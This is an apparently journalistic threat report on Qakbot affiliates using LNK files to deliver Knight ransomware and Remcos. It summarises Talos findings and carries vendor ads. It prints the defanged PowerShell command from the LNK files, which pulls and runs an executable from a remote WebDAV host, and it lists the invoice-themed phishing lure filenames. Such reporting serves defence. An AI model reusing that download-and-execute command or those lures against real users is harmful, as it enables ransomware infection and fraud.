Qakbot Threat Actors Deliver Knight Ransomware & Remcos Via LNK Files

Qakbot’s infrastructure and cryptocurrency assets were seized by government authorities in an operation in August 2023 with the assistance of international allies, raising concerns about the affiliates of Qakbot.

Talos researchers moderately believe Qakbot threat actors remain active, launching a recent campaign with Cyclops/Ransom Knight ransomware and the Remcos backdoor, tracked through LNK file metadata connections to past campaigns.

Talos researchers used LNK file metadata to trace threat actors, linking the “AA” and “BB” campaigns in January 2023. 

After their report, Qakbot actors in the “AA,” “BB,” and “Obama” campaigns began removing LNK file metadata to evade detection and tracking.

FREE Demo

Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

Free Demo

Technical analysis

New LNK files from the same system were discovered by Talos in August 2023, leading to a network share that contained the ransomware Ransom Knight. According to analysis, they direct users to Powershell.exe and pass parameters for the subsequent download step:-

• -c “explorer ‘\\89[.]23[.]96[.]203@80\333\'”; Start-Sleep -Seconds 1; Stop-Process -Name explorer; \\89[.]23[.]96[.]203@80\333\information.exe

Executing Explorer.exe to access remote IP 89[.]23[.]96[.]203 via WebDAV (port 80) might evade command line detection for PowerShell remote executable downloads (T1105). 

These LNK filenames hint at urgent financial topics, indicating phishing in Qakbot campaigns. Here below, we have mentioned all the filenames of the LNK files:-

• ATTENTION-Invoice-29-August.docx.lnk
• bank transfer request.lnk
• Booking info.pdf.lnk
• Fattura NON pagata Agosto 2023.docx.lnk
• FRAUD bank transfer report.pdf.lnk
• invoice OTP bank.pdf.lnk
• MANDATORY-Invoice-28-August.docx.lnk
• NOT-paid-Invoice-26-August.pdf.lnk
• Nuove coordinate bancarie e IBAN 2023.docx.lnk
• Nuove coordinate bancarie e IBAN 2023.img.lnk
• Pay-Invoices-29-August.pdf.lnk
• URGENT-Invoice-27-August.docx.lnk

Italian filenames hint at regional targeting, while LNK files in Zip archives accompany XLL files, typically associated with Excel add-ins and similar icons.

The LNK file fetches the Ransom Knight payload from remote IP 89[.]23[.]96[.]203 via WebDAV, marking an evolved version of the Cyclops ransomware, announced by its operator in May 2023

Experts suggest that Qakbot threat actors are customers, not operators, of the ransomware service. The FBI operation in August 2023 mainly targeted control servers, leaving email delivery unaffected. 

While Qakbot distribution paused post-takedown, the threat could resurge if the operators rebuild their infrastructure.

Protect yourself from vulnerabilities using Patch Manager Plus to patch over 850 third-party applications quickly. Take advantage of the free trial to ensure 100% security.